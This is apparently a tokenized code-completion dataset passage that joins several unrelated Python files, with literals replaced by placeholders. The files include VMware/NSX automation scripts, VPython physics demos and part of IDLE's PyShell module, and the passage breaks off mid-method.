update ( '<STR_LIT>' , uri_parameters = { '<STR_LIT>' : edgeid , '<STR_LIT>' : rule_id } , <EOL> request_body_dict = nat_spec ) <EOL> session . view_response ( create_response ) <EOL> def query_nat ( session , edgeid = '<STR_LIT>' ) : <EOL> response = session . read ( '<STR_LIT>' , uri_parameters = { '<STR_LIT>' : edgeid } ) <EOL> session . view_response ( response ) <EOL> def delete_nat ( session , edgeid = '<STR_LIT>' ) : <EOL> del_response = session . delete ( '<STR_LIT>' , uri_parameters = { '<STR_LIT>' : edgeid } ) <EOL> session . view_response ( del_response ) <EOL> def main ( ) : <EOL> session = NsxClient ( nsxraml_file , nsxmanager , nsx_username , nsx_password , debug = True ) <EOL> configure_nat ( session ) <EOL> append_nat ( session ) <EOL> query_nat ( session ) <EOL> rule_id = raw_input ( '<STR_LIT>' ) <EOL> update_nat ( session , rule_id ) <EOL> delete_nat ( session ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import atexit <EOL> import hashlib <EOL> import json <EOL> import random <EOL> import time <EOL> import requests <EOL> from pyVim import connect <EOL> from pyVmomi import vim <EOL> from tools import cli <EOL> from tools import tasks <EOL> def get_args ( ) : <EOL> """<STR_LIT>""" <EOL> parser = cli . build_arg_parser ( ) <EOL> parser . add_argument ( '<STR_LIT:-c>' , '<STR_LIT>' , <EOL> type = int , <EOL> required = True , <EOL> action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> required = True , <EOL> action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> required = False , <EOL> action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> required = False , <EOL> action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> return cli . prompt_for_password ( args ) <EOL> def get_marvel_characters ( number_of_characters , marvel_public_key , <EOL> marvel_private_key ) : <EOL> """<STR_LIT>""" <EOL> timestamp = str ( int ( time . time ( ) ) ) <EOL> hash_value = hashlib . md5 ( timestamp + marvel_private_key + <EOL> marvel_public_key ) . hexdigest ( ) <EOL> characters = [ ] <EOL> for _num in xrange ( number_of_characters ) : <EOL> offset = random . randrange ( <NUM_LIT:1> , <NUM_LIT> ) <EOL> limit = '<STR_LIT:1>' <EOL> url = ( '<STR_LIT>' + <EOL> limit + '<STR_LIT>' + str ( offset ) + '<STR_LIT>' + <EOL> marvel_public_key + '<STR_LIT>' + timestamp + '<STR_LIT>' + hash_value ) <EOL> headers = { '<STR_LIT>' : '<STR_LIT:application/json>' } <EOL> request = requests . get ( url , headers = headers ) <EOL> data = json . loads ( request . content ) <EOL> if data . 
get ( '<STR_LIT:code>' ) == '<STR_LIT>' : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> character = data [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] . strip ( ) . replace ( '<STR_LIT:U+0020>' , <EOL> '<STR_LIT:_>' ) <EOL> characters . append ( character ) <EOL> return characters <EOL> def create_dummy_vm ( name , service_instance , vm_folder , resource_pool , <EOL> datastore ) : <EOL> """<STR_LIT>""" <EOL> vm_name = '<STR_LIT>' + name <EOL> datastore_path = '<STR_LIT:[>' + datastore + '<STR_LIT>' + vm_name <EOL> vmx_file = vim . vm . FileInfo ( logDirectory = None , <EOL> snapshotDirectory = None , <EOL> suspendDirectory = None , <EOL> vmPathName = datastore_path ) <EOL> config = vim . vm . ConfigSpec ( name = vm_name , memoryMB = <NUM_LIT> , numCPUs = <NUM_LIT:1> , <EOL> files = vmx_file , guestId = '<STR_LIT>' , <EOL> version = '<STR_LIT>' ) <EOL> print "<STR_LIT>" . format ( vm_name ) <EOL> task = vm_folder . CreateVM_Task ( config = config , pool = resource_pool ) <EOL> tasks . wait_for_tasks ( service_instance , [ task ] ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> args = get_args ( ) <EOL> if args . public_key_file : <EOL> with open ( args . public_key_file ) as key_file : <EOL> marvel_public_key = key_file . readline ( ) . strip ( ) <EOL> else : <EOL> marvel_public_key = raw_input ( '<STR_LIT>' ) . strip ( ) <EOL> if args . private_key_file : <EOL> with open ( args . private_key_file ) as key_file : <EOL> marvel_private_key = key_file . readline ( ) . strip ( ) <EOL> else : <EOL> marvel_private_key = raw_input ( '<STR_LIT>' ) . strip ( ) <EOL> service_instance = connect . SmartConnect ( host = args . host , <EOL> user = args . user , <EOL> pwd = args . password , <EOL> port = int ( args . port ) ) <EOL> if not service_instance : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return - <NUM_LIT:1> <EOL> atexit . register ( connect . Disconnect , service_instance ) <EOL> content = service_instance . 
RetrieveContent ( ) <EOL> datacenter = content . rootFolder . childEntity [ <NUM_LIT:0> ] <EOL> vmfolder = datacenter . vmFolder <EOL> hosts = datacenter . hostFolder . childEntity <EOL> resource_pool = hosts [ <NUM_LIT:0> ] . resourcePool <EOL> print ( "<STR_LIT>" + str ( args . count ) + <EOL> "<STR_LIT>" ) <EOL> characters = get_marvel_characters ( args . count , <EOL> marvel_public_key , <EOL> marvel_private_key ) <EOL> for name in characters : <EOL> create_dummy_vm ( name , service_instance , vmfolder , resource_pool , <EOL> args . datastore ) <EOL> return <NUM_LIT:0> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import atexit <EOL> from pyVim import connect <EOL> from tools import cli <EOL> def setup_args ( ) : <EOL> """<STR_LIT>""" <EOL> parser = cli . build_arg_parser ( ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> required = True , <EOL> help = '<STR_LIT>' ) <EOL> my_args = parser . parse_args ( ) <EOL> return cli . prompt_for_password ( my_args ) <EOL> args = setup_args ( ) <EOL> si = None <EOL> try : <EOL> si = connect . SmartConnect ( host = args . host , <EOL> user = args . user , <EOL> pwd = args . password , <EOL> port = int ( args . port ) ) <EOL> atexit . register ( connect . Disconnect , si ) <EOL> except IOError as e : <EOL> pass <EOL> if not si : <EOL> raise SystemExit ( "<STR_LIT>" ) <EOL> vm = si . content . searchIndex . FindByUuid ( None , args . uuid , True , True ) <EOL> if not vm : <EOL> raise SystemExit ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" . format ( vm . name ) ) <EOL> print ( "<STR_LIT>" . format ( vm . runtime . powerState ) ) <EOL> vm . RebootGuest ( ) <EOL> print ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> from pyVmomi import vim <EOL> vim . ManagedObject . id = property ( lambda self : self . _moId ) </s>
<s> allowGetSet = False <EOL> allowCapitalizedNames = False </s>
<s> import json <EOL> import logging <EOL> import os <EOL> from pathlib import Path <EOL> from urllib . request import urlopen , Request <EOL> logger = logging . getLogger ( __name__ ) <EOL> def get_links ( client_id ) : <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' . format ( client_id ) } <EOL> req = Request ( '<STR_LIT>' , headers = headers , method = '<STR_LIT:GET>' ) <EOL> with urlopen ( req ) as resp : <EOL> data = json . loads ( resp . read ( ) . decode ( '<STR_LIT:utf-8>' ) ) <EOL> return map ( lambda item : item [ '<STR_LIT>' ] , data [ '<STR_LIT:data>' ] ) <EOL> def download_link ( directory , link ) : <EOL> download_path = directory / os . path . basename ( link ) <EOL> with urlopen ( link ) as image , download_path . open ( '<STR_LIT:wb>' ) as f : <EOL> f . write ( image . read ( ) ) <EOL> logger . info ( '<STR_LIT>' , link ) <EOL> def setup_download_dir ( ) : <EOL> download_dir = Path ( '<STR_LIT>' ) <EOL> if not download_dir . exists ( ) : <EOL> download_dir . mkdir ( ) <EOL> return download_dir </s>
<s> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = [ "<STR_LIT>" ] , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> zip_safe = False , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> import logging <EOL> import time <EOL> from apns_proxy_client import APNSProxyClient <EOL> valid_token = "<STR_LIT>" <EOL> def main ( ) : <EOL> client = APNSProxyClient ( host = "<STR_LIT:localhost>" , port = <NUM_LIT> , application_id = "<STR_LIT>" ) <EOL> with client : <EOL> token = valid_token <EOL> i = <NUM_LIT:0> <EOL> interval = <NUM_LIT> <EOL> while i < <NUM_LIT:1000> : <EOL> i += <NUM_LIT:1> <EOL> client . send ( token , '<STR_LIT>' + str ( i ) , badge = i ) <EOL> print ( "<STR_LIT>" % i ) <EOL> if interval < <NUM_LIT:20> * <NUM_LIT> : <EOL> interval = int ( interval * <NUM_LIT> ) <EOL> time . sleep ( interval ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) <EOL> print ( "<STR_LIT>" ) </s>
<s> from visual import * <EOL> scene . height = scene . width = <NUM_LIT> <EOL> scene . center = ( <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:0> ) <EOL> def spiral ( nloop = <NUM_LIT:1> , tightness = <NUM_LIT:1.0> , dir = <NUM_LIT:1.0> , scale = <NUM_LIT:1.0> ) : <EOL> spr = [ ] <EOL> scale = [ ] <EOL> clrs = [ ] <EOL> zd = <NUM_LIT> <EOL> for t in range ( <NUM_LIT:1> , <NUM_LIT> * nloop , <NUM_LIT:16> ) : <EOL> t *= <NUM_LIT> <EOL> x = tightness / <NUM_LIT> * t * math . cos ( t ) * dir <EOL> y = tightness / <NUM_LIT> * t * math . sin ( t ) <EOL> sc = sqrt ( x * x + y * y ) <EOL> z = t / <NUM_LIT> <EOL> spr . append ( ( x , y , z ) ) <EOL> clr = vector ( ( z * cos ( t ) , abs ( sin ( t ) ) , abs ( cos ( t * <NUM_LIT:2> ) ) ) ) . norm ( ) <EOL> clrs . append ( clr ) <EOL> scale . append ( ( sc , sc ) ) <EOL> return spr , scale , clrs <EOL> path , scale , clrs = spiral ( nloop = <NUM_LIT:2> , tightness = <NUM_LIT> ) <EOL> elps = shapes . circle ( radius = <NUM_LIT> , thickness = <NUM_LIT> ) <EOL> ee = extrusion ( frame = frame ( ) , shape = elps , pos = path , scale = scale , color = clrs , material = materials . marble ) <EOL> ee . frame . rotate ( angle = pi / <NUM_LIT:2> ) </s>
<s> from visual import * <EOL> G = <NUM_LIT> <EOL> giant = sphere ( pos = ( - <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) , radius = <NUM_LIT> , color = color . red , <EOL> make_trail = True , interval = <NUM_LIT:10> ) <EOL> giant . mass = <NUM_LIT> <EOL> giant . p = vector ( <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT> ) * giant . mass <EOL> dwarf = sphere ( pos = ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) , radius = <NUM_LIT> , color = color . yellow , <EOL> make_trail = True , interval = <NUM_LIT:10> ) <EOL> dwarf . mass = <NUM_LIT> <EOL> dwarf . p = - giant . p <EOL> dt = <NUM_LIT> <EOL> while True : <EOL> rate ( <NUM_LIT:200> ) <EOL> dist = dwarf . pos - giant . pos <EOL> force = G * giant . mass * dwarf . mass * dist / mag ( dist ) ** <NUM_LIT:3> <EOL> giant . p = giant . p + force * dt <EOL> dwarf . p = dwarf . p - force * dt <EOL> for star in [ giant , dwarf ] : <EOL> star . pos = star . pos + star . p / star . mass * dt </s>
<s> import os <EOL> import os . path <EOL> import sys <EOL> import string <EOL> import getopt <EOL> import re <EOL> import socket <EOL> import time <EOL> import threading <EOL> import traceback <EOL> import types <EOL> import subprocess <EOL> import macosxSupport <EOL> import linecache <EOL> from code import InteractiveInterpreter <EOL> try : <EOL> from Tkinter import * <EOL> except ImportError : <EOL> print >> sys . __stderr__ , "<STR_LIT>" "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> import tkMessageBox <EOL> from EditorWindow import EditorWindow , fixwordbreaks <EOL> from FileList import FileList <EOL> from ColorDelegator import ColorDelegator <EOL> from UndoDelegator import UndoDelegator <EOL> from OutputWindow import OutputWindow <EOL> from configHandler import idleConf <EOL> from utils import tb_print_list <EOL> import idlever <EOL> import rpc <EOL> import Debugger <EOL> import RemoteDebugger <EOL> IDENTCHARS = string . ascii_letters + string . digits + "<STR_LIT:_>" <EOL> HOST = '<STR_LIT:127.0.0.1>' <EOL> PORT = <NUM_LIT:0> <EOL> global warning_stream <EOL> warning_stream = sys . __stderr__ <EOL> try : <EOL> import warnings <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> def idle_showwarning ( message , category , filename , lineno , <EOL> file = None , line = None ) : <EOL> if file is None : <EOL> file = warning_stream <EOL> try : <EOL> file . write ( warnings . formatwarning ( message , category , filename , <EOL> lineno , file = file , line = line ) ) <EOL> except IOError : <EOL> pass <EOL> warnings . showwarning = idle_showwarning <EOL> def idle_formatwarning ( message , category , filename , lineno , line = None ) : <EOL> """<STR_LIT>""" <EOL> s = "<STR_LIT>" <EOL> s += '<STR_LIT>' % ( filename , lineno ) <EOL> if line is None : <EOL> line = linecache . getline ( filename , lineno ) <EOL> line = line . strip ( ) <EOL> if line : <EOL> s += "<STR_LIT>" % line <EOL> s += "<STR_LIT>" % ( category . 
__name__ , message ) <EOL> return s <EOL> warnings . formatwarning = idle_formatwarning <EOL> def extended_linecache_checkcache ( filename = None , <EOL> orig_checkcache = linecache . checkcache ) : <EOL> """<STR_LIT>""" <EOL> cache = linecache . cache <EOL> save = { } <EOL> for key in list ( cache ) : <EOL> if key [ : <NUM_LIT:1> ] + key [ - <NUM_LIT:1> : ] == '<STR_LIT>' : <EOL> save [ key ] = cache . pop ( key ) <EOL> orig_checkcache ( filename ) <EOL> cache . update ( save ) <EOL> linecache . checkcache = extended_linecache_checkcache <EOL> class PyShellEditorWindow ( EditorWindow ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , * args ) : <EOL> self . breakpoints = [ ] <EOL> EditorWindow . __init__ ( self , * args ) <EOL> self . text . bind ( "<STR_LIT>" , self . set_breakpoint_here ) <EOL> self . text . bind ( "<STR_LIT>" , self . clear_breakpoint_here ) <EOL> self . text . bind ( "<STR_LIT>" , self . flist . open_shell ) <EOL> self . breakpointPath = os . path . join ( idleConf . GetUserCfgDir ( ) , <EOL> '<STR_LIT>' ) <EOL> if self . io . filename : self . restore_file_breaks ( ) <EOL> def filename_changed_hook ( old_hook = self . io . filename_change_hook , <EOL> self = self ) : <EOL> self . restore_file_breaks ( ) <EOL> old_hook ( ) <EOL> self . io . set_filename_change_hook ( filename_changed_hook ) <EOL> rmenu_specs = [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( None , None , None ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , None ) <EOL> ] <EOL> def set_breakpoint ( self , lineno ) : <EOL> text = self . text <EOL> filename = self . io . filename <EOL> text . tag_add ( "<STR_LIT>" , "<STR_LIT>" % lineno , "<STR_LIT>" % ( lineno + <NUM_LIT:1> ) ) <EOL> try : <EOL> i = self . breakpoints . index ( lineno ) <EOL> except ValueError : <EOL> self . breakpoints . 
append ( lineno ) <EOL> try : <EOL> debug = self . flist . pyshell . interp . debugger <EOL> debug . set_breakpoint_here ( filename , lineno ) <EOL> except : <EOL> pass <EOL> def set_breakpoint_here ( self , event = None ) : <EOL> text = self . text <EOL> filename = self . io . filename <EOL> if not filename : <EOL> text . bell ( ) <EOL> return <EOL> lineno = int ( float ( text . index ( "<STR_LIT>" ) ) ) <EOL> self . set_breakpoint ( lineno ) <EOL> def clear_breakpoint_here ( self , event = None ) : <EOL> text = self . text <EOL> filename = self . io . filename <EOL> if not filename : <EOL> text . bell ( ) <EOL> return <EOL> lineno = int ( float ( text . index ( "<STR_LIT>" ) ) ) <EOL> try : <EOL> self . breakpoints . remove ( lineno ) <EOL> except : <EOL> pass <EOL> text . tag_remove ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> try : <EOL> debug = self . flist . pyshell . interp . debugger <EOL> debug . clear_breakpoint_here ( filename , lineno ) <EOL> except : <EOL> pass <EOL> def clear_file_breaks ( self ) : <EOL> if self . breakpoints : <EOL> text = self . text <EOL> filename = self . io . filename <EOL> if not filename : <EOL> text . bell ( ) <EOL> return <EOL> self . breakpoints = [ ] <EOL> text . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , END ) <EOL> try : <EOL> debug = self . flist . pyshell . interp . debugger <EOL> debug . clear_file_breaks ( filename ) <EOL> except : <EOL> pass <EOL> def store_file_breaks ( self ) : <EOL> "<STR_LIT>" <EOL> breaks = self . breakpoints <EOL> filename = self . io . filename <EOL> try : <EOL> lines = open ( self . breakpointPath , "<STR_LIT:r>" ) . readlines ( ) <EOL> except IOError : <EOL> lines = [ ] <EOL> new_file = open ( self . breakpointPath , "<STR_LIT:w>" ) <EOL> for line in lines : <EOL> if not line . startswith ( filename + '<STR_LIT:=>' ) : <EOL> new_file . write ( line ) <EOL> self . update_breakpoints ( ) <EOL> breaks = self . breakpoints <EOL> if breaks : <EOL> new_file . 
write ( filename + '<STR_LIT:=>' + str ( breaks ) + '<STR_LIT:\n>' ) <EOL> new_file . close ( ) <EOL> def restore_file_breaks ( self ) : <EOL> self . text . update ( ) <EOL> filename = self . io . filename <EOL> if filename is None : <EOL> return <EOL> if os . path . isfile ( self . breakpointPath ) : <EOL> lines = open ( self . breakpointPath , "<STR_LIT:r>" ) . readlines ( ) <EOL> for line in lines : <EOL> if line . startswith ( filename + '<STR_LIT:=>' ) : <EOL> breakpoint_linenumbers = eval ( line [ len ( filename ) + <NUM_LIT:1> : ] ) <EOL> for breakpoint_linenumber in breakpoint_linenumbers : <EOL> self . set_breakpoint ( breakpoint_linenumber ) <EOL> def update_breakpoints ( self ) : <EOL> "<STR_LIT>" <EOL> text = self . text <EOL> ranges = text . tag_ranges ( "<STR_LIT>" ) <EOL> linenumber_list = self . ranges_to_linenumbers ( ranges ) <EOL> self . breakpoints = linenumber_list <EOL> def ranges_to_linenumbers ( self , ranges ) : <EOL> """<STR_LIT>""" <EOL> lines = [ ] <EOL> for index in range ( <NUM_LIT:0> , len ( ranges ) , <NUM_LIT:2> ) : <EOL> lineno = int ( float ( str ( ranges [ index ] ) ) ) <EOL> end = int ( float ( str ( ranges [ index + <NUM_LIT:1> ] ) ) ) <EOL> while lineno < end : <EOL> lines . append ( lineno ) <EOL> lineno += <NUM_LIT:1> <EOL> return lines <EOL> def _close ( self ) : <EOL> "<STR_LIT>" <EOL> self . clear_file_breaks ( ) <EOL> EditorWindow . _close ( self ) <EOL> class PyShellFileList ( FileList ) : <EOL> "<STR_LIT>" <EOL> EditorWindow = PyShellEditorWindow <EOL> pyshell = None <EOL> def open_shell ( self , event = None ) : <EOL> if self . pyshell : <EOL> self . pyshell . top . wakeup ( ) <EOL> else : <EOL> self . pyshell = PyShell ( self ) <EOL> if self . pyshell : <EOL> if not self . pyshell . begin ( ) : <EOL> return None <EOL> return self . pyshell <EOL> class ModifiedColorDelegator ( ColorDelegator ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> ColorDelegator . __init__ ( self ) <EOL> self . 
LoadTagDefs ( ) <EOL> def recolorize_main ( self ) : <EOL> self . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT>" ) <EOL> self . tag_add ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT>" ) <EOL> ColorDelegator . recolorize_main ( self ) <EOL> def LoadTagDefs ( self ) : <EOL> ColorDelegator . LoadTagDefs ( self ) <EOL> theme = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> self . tagdefs . update ( { <EOL> "<STR_LIT>" : { '<STR_LIT>' : None , '<STR_LIT>' : None } , <EOL> "<STR_LIT>" : idleConf . GetHighlight ( theme , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : idleConf . GetHighlight ( theme , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : idleConf . GetHighlight ( theme , "<STR_LIT>" ) , <EOL> } ) <EOL> class ModifiedUndoDelegator ( UndoDelegator ) : <EOL> "<STR_LIT>" <EOL> def insert ( self , index , chars , tags = None ) : <EOL> try : <EOL> if self . delegate . compare ( index , "<STR_LIT:<>" , "<STR_LIT>" ) : <EOL> self . delegate . bell ( ) <EOL> return <EOL> except TclError : <EOL> pass <EOL> UndoDelegator . insert ( self , index , chars , tags ) <EOL> def delete ( self , index1 , index2 = None ) : <EOL> try : <EOL> if self . delegate . compare ( index1 , "<STR_LIT:<>" , "<STR_LIT>" ) : <EOL> self . delegate . bell ( ) <EOL> return <EOL> except TclError : <EOL> pass <EOL> UndoDelegator . delete ( self , index1 , index2 ) <EOL> class MyRPCClient ( rpc . RPCClient ) : <EOL> def handle_EOF ( self ) : <EOL> "<STR_LIT>" <EOL> raise EOFError <EOL> class ModifiedInterpreter ( InteractiveInterpreter ) : <EOL> def __init__ ( self , tkconsole ) : <EOL> self . tkconsole = tkconsole <EOL> locals = sys . modules [ '<STR_LIT:__main__>' ] . __dict__ <EOL> InteractiveInterpreter . __init__ ( self , locals = locals ) <EOL> self . save_warnings_filters = None <EOL> self . restarting = False <EOL> self . subprocess_arglist = None <EOL> self . port = PORT <EOL> rpcclt = None <EOL> rpcproc = None <EOL> def spawn_subprocess ( self ) : <EOL> if self . 
subprocess_arglist is None : <EOL> self . subprocess_arglist = self . build_subprocess_arglist ( ) <EOL> args = self . subprocess_arglist <EOL> self . rpcproc = subprocess . Popen ( [ sys . executable ] + args [ <NUM_LIT:1> : ] ) <EOL> def build_subprocess_arglist ( self ) : <EOL> assert ( self . port != <NUM_LIT:0> ) , ( <EOL> "<STR_LIT>" ) <EOL> w = [ '<STR_LIT>' + s for s in sys . warnoptions ] <EOL> if <NUM_LIT:1> / <NUM_LIT:2> > <NUM_LIT:0> : <EOL> w . append ( '<STR_LIT>' ) <EOL> del_exitf = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> default = False , type = '<STR_LIT:bool>' ) <EOL> if __name__ == '<STR_LIT>' : <EOL> command = "<STR_LIT>" % ( del_exitf , ) <EOL> else : <EOL> command = "<STR_LIT>" % ( del_exitf , ) <EOL> if sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' and '<STR_LIT:U+0020>' in sys . executable : <EOL> decorated_exec = '<STR_LIT>' % sys . executable <EOL> else : <EOL> decorated_exec = sys . executable <EOL> return [ decorated_exec ] + w + [ "<STR_LIT:-c>" , command , str ( self . port ) ] <EOL> def start_subprocess ( self ) : <EOL> addr = ( HOST , self . port ) <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> time . sleep ( i ) <EOL> try : <EOL> self . rpcclt = MyRPCClient ( addr ) <EOL> break <EOL> except socket . error , err : <EOL> pass <EOL> else : <EOL> self . display_port_binding_error ( ) <EOL> return None <EOL> self . port = self . rpcclt . listening_sock . getsockname ( ) [ <NUM_LIT:1> ] <EOL> if PORT != <NUM_LIT:0> : <EOL> self . rpcclt . listening_sock . setsockopt ( socket . SOL_SOCKET , <EOL> socket . SO_REUSEADDR , <NUM_LIT:1> ) <EOL> self . spawn_subprocess ( ) <EOL> self . rpcclt . listening_sock . settimeout ( <NUM_LIT:10> ) <EOL> try : <EOL> self . rpcclt . accept ( ) <EOL> except socket . timeout , err : <EOL> self . display_no_subprocess_error ( ) <EOL> return None <EOL> self . rpcclt . register ( "<STR_LIT>" , self . tkconsole ) <EOL> self . rpcclt . register ( "<STR_LIT>" , self . tkconsole . 
stdout ) <EOL> self . rpcclt . register ( "<STR_LIT>" , self . tkconsole . stderr ) <EOL> self . rpcclt . register ( "<STR_LIT>" , self . tkconsole . flist ) <EOL> self . rpcclt . register ( "<STR_LIT>" , linecache ) <EOL> self . rpcclt . register ( "<STR_LIT>" , self ) <EOL> self . transfer_path ( ) <EOL> self . poll_subprocess ( ) <EOL> return self . rpcclt <EOL> def get_restart_line ( self ) : <EOL> halfbar = ( ( int ( self . tkconsole . width ) - <NUM_LIT:16> ) // <NUM_LIT:2> ) * '<STR_LIT:=>' <EOL> return halfbar + '<STR_LIT>' + halfbar <EOL> def restart_subprocess ( self ) : <EOL> if self . restarting : <EOL> return self . rpcclt <EOL> self . restarting = True <EOL> debug = self . getdebugger ( ) <EOL> if debug : <EOL> try : <EOL> RemoteDebugger . close_subprocess_debugger ( self . rpcclt ) <EOL> except : <EOL> pass <EOL> self . rpcclt . close ( ) <EOL> self . terminate_subprocess ( ) <EOL> console = self . tkconsole <EOL> was_executing = console . executing <EOL> console . executing = False <EOL> self . spawn_subprocess ( ) <EOL> try : <EOL> self . rpcclt . accept ( ) <EOL> except socket . timeout , err : <EOL> self . display_no_subprocess_error ( ) <EOL> return None <EOL> self . transfer_path ( ) <EOL> console . text . delete ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if was_executing : <EOL> console . write ( '<STR_LIT:\n>' ) <EOL> console . showprompt ( ) <EOL> console . write ( self . get_restart_line ( ) ) <EOL> console . text . tag_add ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> console . showprompt ( ) <EOL> if debug : <EOL> gui = RemoteDebugger . restart_subprocess_debugger ( self . rpcclt ) <EOL> debug . load_breakpoints ( ) <EOL> self . restarting = False <EOL> return self . rpcclt <EOL> def __request_interrupt ( self ) : <EOL> self . rpcclt . remotecall ( "<STR_LIT>" , "<STR_LIT>" , ( ) , { } ) <EOL> def interrupt_subprocess ( self ) : <EOL> threading . Thread ( target = self . __request_interrupt ) . 
start ( ) <EOL> def kill_subprocess ( self ) : <EOL> try : <EOL> self . rpcclt . close ( ) <EOL> except AttributeError : <EOL> pass <EOL> self . terminate_subprocess ( ) <EOL> self . tkconsole . executing = False <EOL> self . rpcclt = None <EOL> def terminate_subprocess ( self ) : <EOL> "<STR_LIT>" <EOL> if sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> try : <EOL> self . rpcproc . kill ( ) <EOL> except WindowsError : <EOL> pass <EOL> else : <EOL> self . rpcproc . kill ( ) <EOL> self . rpcproc . wait ( ) <EOL> def transfer_path ( self ) : <EOL> self . runcommand ( """<STR_LIT>""" % ( sys . path , ) ) <EOL> active_seq = None <EOL> def poll_subprocess ( self ) : <EOL> clt = self . rpcclt <EOL> if clt is None : <EOL> return <EOL> try : <EOL> response = clt . pollresponse ( self . active_seq , wait = <NUM_LIT> ) <EOL> except ( EOFError , IOError , KeyboardInterrupt ) : <EOL> if self . tkconsole . closing : <EOL> return <EOL> response = None <EOL> self . restart_subprocess ( ) <EOL> if response : <EOL> self . tkconsole . resetoutput ( ) <EOL> self . active_seq = None <EOL> how , what = response <EOL> console = self . tkconsole . console <EOL> if how == "<STR_LIT:OK>" : <EOL> if what is not None : <EOL> print >> console , repr ( what ) <EOL> elif how == "<STR_LIT>" : <EOL> if self . tkconsole . getvar ( "<STR_LIT>" ) : <EOL> self . remote_stack_viewer ( ) <EOL> elif how == "<STR_LIT>" : <EOL> errmsg = "<STR_LIT>" <EOL> print >> sys . __stderr__ , errmsg , what <EOL> print >> console , errmsg , what <EOL> try : <EOL> self . tkconsole . endexecuting ( ) <EOL> except AttributeError : <EOL> pass <EOL> if not self . tkconsole . closing : <EOL> self . tkconsole . text . after ( self . tkconsole . pollinterval , <EOL> self . poll_subprocess ) <EOL> debugger = None <EOL> def setdebugger ( self , debugger ) : <EOL> self . debugger = debugger <EOL> def getdebugger ( self ) : <EOL> return self . 
